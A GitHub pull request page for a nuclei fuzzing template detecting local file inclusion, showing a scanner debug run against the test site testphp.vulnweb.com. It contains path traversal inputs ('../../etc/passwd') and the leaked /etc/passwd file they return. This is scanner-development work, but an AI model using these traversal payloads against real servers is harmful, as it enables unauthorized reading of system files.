Skip to content
This repository has been archived by the owner on May 2, 2024. It is now read-only.

Create lfi-linux.yaml #14

Merged
merged 3 commits into from
Feb 2, 2023
Merged

Create lfi-linux.yaml #14

merged 3 commits into from
Feb 2, 2023

Conversation

DhiyaneshGeek
Copy link
Member

@DhiyaneshGeek DhiyaneshGeek commented Jan 30, 2023
edited
Loading 

root@localhost:~# nuclei -u http://testphp.vulnweb.com/showimage.php?file= -t test.yaml -debug-resp

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.8.8

		projectdiscovery.io

[INF] Using Nuclei Engine 2.8.8 (latest)
[INF] Using Nuclei Templates 9.3.6 (latest)
[INF] Templates added in last update: 30
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[DBG] [lfi-linux] Dumped HTTP response http://testphp.vulnweb.com/showimage.php?file=/etc/passwd

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: image/jpeg
Date: Mon, 30 Jan 2023 19:30:54 GMT
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1


Warning: fopen(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/hj/:/tmp/:/proc/) in /hj/var/www/showimage.php on line 13

Warning: fopen(/etc/passwd): failed to open stream: Operation not permitted in /hj/var/www/showimage.php on line 13

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 19
[DBG] [lfi-linux] Dumped HTTP response http://testphp.vulnweb.com/showimage.php?file=../../etc/passwd

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: image/jpeg
Date: Mon, 30 Jan 2023 19:30:55 GMT
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
nobody:x:65534:1002:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

@DhiyaneshGeek DhiyaneshGeek self-assigned this Jan 30, 2023
@ehsandeep ehsandeep merged commit 22fa03f into main Feb 2, 2023
@ehsandeep ehsandeep deleted the lfi-linux branch February 2, 2023 09:48
fengjixuchui referenced this pull request in fengjixuchui/fuzzing-templates Feb 2, 2023
@fengjixuchui
Merge pull request #1 from projectdiscovery/main
9525a4a 
Create lfi-linux.yaml (projectdiscovery#14)
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers

@ehsandeep ehsandeep ehsandeep approved these changes

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@DhiyaneshGeek @ehsandeep